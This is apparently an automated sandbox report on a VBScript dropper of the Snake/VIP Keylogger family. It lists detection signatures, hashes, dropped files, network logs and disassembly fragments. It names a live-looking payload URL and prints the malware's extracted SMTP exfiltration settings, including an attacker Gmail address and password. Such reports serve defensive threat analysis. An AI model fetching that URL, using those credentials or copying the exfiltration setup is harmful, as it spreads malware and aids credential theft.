Windows Analysis Report
Bukti-Transfer.vbs

Overview

General Information

Sample name: Bukti-Transfer.vbs
Analysis ID: 1500267
MD5: 11a8dbecbeb35ba5652b8fd4a9cefc9d
SHA1: 8ec32ebe929a907ce8c19433e5c5a6f48f7639c1
SHA256: 7441ee61db5f1ca3b26cf09df0763fed9f959b30970be46497e17f8470cb57a6
Tags: SnakeKeyloggervbs
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Benign windows process drops PE files
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
Contains functionality to disable the Task Manager (.Net Source)
Creates multiple autostart registry keys
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Sigma detected: WScript or CScript Dropper - File
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Script Initiated Connection
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
404 Keylogger, Snake Keylogger Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

AV Detection
barindex
Antivirus detection for URL or domain
Source: http://192.210.215.11/zoom/aus1.js Avira URL Cloud: Label: malware
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\MKLTPZ.js Avira: detection malicious, Label: JS/Dldr.G17
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Users\user\AppData\Roaming\Service.exe Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\aus1[1].js Avira: detection malicious, Label: JS/Dldr.G17
Found malware configuration
Source: 2.2.PbsonX.exe.37b1db0.3.raw.unpack Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "austin.williams33533@gmail.com ", "Password": "lyao lcfc jjdk kszy", "Host": "smtp.gmail.com", "Port": "587", "Version": "4.4"}
Multi AV Scanner detection for domain / URL
Source: http://192.210.215.11/ Virustotal: Detection: 18% Perma Link
Source: http://192.210.215.11/zoom/a Virustotal: Detection: 20% Perma Link
Source: http://192.210.215.11/zoom/ Virustotal: Detection: 20% Perma Link
Source: http://192.210.215.11/zoom/aus1 Virustotal: Detection: 20% Perma Link
Source: http://192.210.215.11/zoom Virustotal: Detection: 5% Perma Link
Multi AV Scanner detection for submitted file
Source: Bukti-Transfer.vbs Virustotal: Detection: 38% Perma Link
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Service.exe Joe Sandbox ML: detected

Location Tracking
barindex
Tries to detect the country of the analysis system (by using the IP)
Source: unknown DNS query: name: reallyfreegeoip.org
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49732 version: TLS 1.0
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49757 version: TLS 1.0
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49758 version: TLS 1.0
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49760 version: TLS 1.0
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49759 version: TLS 1.0
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49761 version: TLS 1.0
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49838 version: TLS 1.0
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49839 version: TLS 1.0
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49845 version: TLS 1.0
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49844 version: TLS 1.0
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49840 version: TLS 1.0
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49916 version: TLS 1.0
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49918 version: TLS 1.0
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49922 version: TLS 1.0
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49923 version: TLS 1.0
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49925 version: TLS 1.0
Source: unknown HTTPS traffic detected: 192.168.2.4:49975 -> 188.114.96.3:443 version: TLS 1.0
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:50003 version: TLS 1.0
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:50004 version: TLS 1.0
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:50010 version: TLS 1.0
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:50015 version: TLS 1.0
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:50016 version: TLS 1.0
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49774 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49856 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49857 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49858 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49859 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49860 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49958 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49959 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49962 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49963 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49968 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50047 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50052 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50054 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50072 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50075 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50132 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50140 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50141 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50145 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50146 version: TLS 1.2
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 00E4F45Dh 3_2_00E4F2C0
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 00E4F45Dh 3_2_00E4F4AC
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 00E4FC19h 3_2_00E4F961
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 0579E959h 3_2_0579E6B0
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 0579D7F9h 3_2_0579D550
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 057931E0h 3_2_05792DC8
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 057931E0h 3_2_05792DBF
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 0579CF49h 3_2_0579CCA0
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 0579F209h 3_2_0579EF60
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 0579E0A9h 3_2_0579DE00
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05792C19h 3_2_05792968
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 057931E0h 3_2_0579310E
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 0579DC51h 3_2_0579D9A8
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 3_2_05790040
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 0579FAB9h 3_2_0579F810
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 0579D3A1h 3_2_0579D0F8
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05790D0Dh 3_2_05790B30
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05791697h 3_2_05790B30
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 0579EDB1h 3_2_0579EB08
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 0579F661h 3_2_0579F3B8
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 0579E501h 3_2_0579E258
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 02F1F2EDh 6_2_02F1F33C
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 02F1F2EDh 6_2_02F1F150
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 02F1FAA9h 6_2_02F1F7F0
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05A09280h 6_2_05A08FB0
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05A07EB5h 6_2_05A07B78
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05A018A1h 6_2_05A015F8
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05A0C82Eh 6_2_05A0C560
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05A00FF1h 6_2_05A00D48
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05A0E81Eh 6_2_05A0E550
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then mov esp, ebp 6_2_05A0AC81
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05A06733h 6_2_05A06488
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then mov esp, ebp 6_2_05A0AC90
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05A00741h 6_2_05A00498
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05A0DEFEh 6_2_05A0DC30
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05A03709h 6_2_05A03460
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05A0BF0Eh 6_2_05A0BC40
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05A0DA6Eh 6_2_05A0D7A0
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05A0BA7Eh 6_2_05A0B7B0
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05A05A29h 6_2_05A05780
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05A0FA5Eh 6_2_05A0F790
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05A079C9h 6_2_05A07720
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05A02A01h 6_2_05A02758
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05A02151h 6_2_05A01EA8
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05A0D14Eh 6_2_05A0CE80
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05A05179h 6_2_05A04ED0
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05A048C9h 6_2_05A04620
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05A07119h 6_2_05A06E70
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05A0F13Eh 6_2_05A0EE70
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05A01449h 6_2_05A011A0
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05A0ECAEh 6_2_05A0E9E0
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05A0CCBEh 6_2_05A0C9F0
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05A00B99h 6_2_05A008F0
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05A0E38Eh 6_2_05A0E0C0
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05A0C39Eh 6_2_05A0C0D0
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05A062D9h 6_2_05A06030
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05A032B1h 6_2_05A03008
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05A002E9h 6_2_05A00040
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05A02E59h 6_2_05A02BB0
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05A05E81h 6_2_05A05BD8
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05A0B5EEh 6_2_05A0B320
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05A055D1h 6_2_05A05328
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05A025A9h 6_2_05A02300
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05A0F5CEh 6_2_05A0F300
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05A0D5DEh 6_2_05A0D310
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05A07571h 6_2_05A072C8
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05A06CC1h 6_2_05A06A18
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05A04D21h 6_2_05A04A78
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05A01CF9h 6_2_05A01A50
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 0173F2EDh 7_2_0173F150
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 0173F2EDh 7_2_0173F33C
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 0173FAA9h 7_2_0173F7F1
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05E031E8h 7_2_05E02DCB
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05E031E8h 7_2_05E02DD0
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05E0F019h 7_2_05E0ED70
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05E0E769h 7_2_05E0E4C0
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05E0DEB9h 7_2_05E0DC10
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05E0DA61h 7_2_05E0D7B8
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05E0D1B1h 7_2_05E0CF08
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 7_2_05E00673
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05E0F8C9h 7_2_05E0F620
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05E0F471h 7_2_05E0F1C8
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05E02C21h 7_2_05E02970
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05E031E8h 7_2_05E03116
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05E0EBC1h 7_2_05E0E918
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05E0E311h 7_2_05E0E068
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 7_2_05E00040
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 7_2_05E00853
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05E0D609h 7_2_05E0D360
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05E00D0Dh 7_2_05E00B30
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05E01697h 7_2_05E00B30
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05E0FD21h 7_2_05E0FA78
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 0224F2EDh 8_2_0224F33C
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 0224F2EDh 8_2_0224F150
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 0224FAA9h 8_2_0224F804
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 0108F2EDh 9_2_0108F150
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 0108F2EDh 9_2_0108F33C
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 0108FAA9h 9_2_0108F804
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 06760D0Dh 9_2_06760B30
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 06761697h 9_2_06760B30
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 06762C21h 9_2_06762970
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 067631E8h 9_2_06762DD0
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 0676FD21h 9_2_0676FA78
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 0676F8C9h 9_2_0676F620
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 0676D609h 9_2_0676D360
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 0676D1B1h 9_2_0676CF08
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 0676DA61h 9_2_0676D7B8
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 0676E311h 9_2_0676E068
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 9_2_06760040
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 0676DEB9h 9_2_0676DC10
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 0676E769h 9_2_0676E4C0
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 0676F019h 9_2_0676ED70
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 067631E8h 9_2_06763116
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 0676EBC1h 9_2_0676E918
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 067631E8h 9_2_06762DC0
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 0676F471h 9_2_0676F1C8
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 0300F2EDh 10_2_0300F33C
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 0300F2EDh 10_2_0300F150
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 0300FAA9h 10_2_0300F7F1
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05B86970h 10_2_05B86678
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05B83076h 10_2_05B82DA8
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05B85066h 10_2_05B84D98
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05B810BEh 10_2_05B80DF0
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05B8F8E0h 10_2_05B8F5E8
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05B88FB0h 10_2_05B88CB8
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05B8A798h 10_2_05B8A4A0
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05B82756h 10_2_05B82488
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05B8BF80h 10_2_05B8BC88
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05B8079Eh 10_2_05B804D0
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05B877C8h 10_2_05B874D0
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05B84746h 10_2_05B84478
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05B8D768h 10_2_05B8D470
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05B8EF50h 10_2_05B8EC58
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05B8D2A0h 10_2_05B8CFA8
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05B8EA88h 10_2_05B8E790
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05B822C6h 10_2_05B81FF8
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05B88AE8h 10_2_05B887F0
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05B842B6h 10_2_05B83FE8
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05B86347h 10_2_05B85FD8
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05B8A2D0h 10_2_05B89FD8
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05B8BAB8h 10_2_05B8B7C0
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05B819DEh 10_2_05B81710
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05B85986h 10_2_05B856B8
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05B83996h 10_2_05B836C8
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05B8B128h 10_2_05B8AE30
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05B8C910h 10_2_05B8C618
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05B8E0F8h 10_2_05B8DE00
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05B88158h 10_2_05B87E60
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05B89940h 10_2_05B89648
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05B87C90h 10_2_05B87998
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05B89478h 10_2_05B89180
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05B8DC30h 10_2_05B8D938
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05B8F418h 10_2_05B8F120
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05B82BE6h 10_2_05B82918
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05B84BD7h 10_2_05B84908
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05B8AC60h 10_2_05B8A968
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05B80C2Eh 10_2_05B80960
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05B8C448h 10_2_05B8C150
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05B87300h 10_2_05B87008
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05B8030Eh 10_2_05B80040
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05B81E47h 10_2_05B81BA0
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05B88620h 10_2_05B88328
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05B89E08h 10_2_05B89B10
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05B83E26h 10_2_05B83B58
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 4x nop then jmp 05B85E16h 10_2_05B85B48
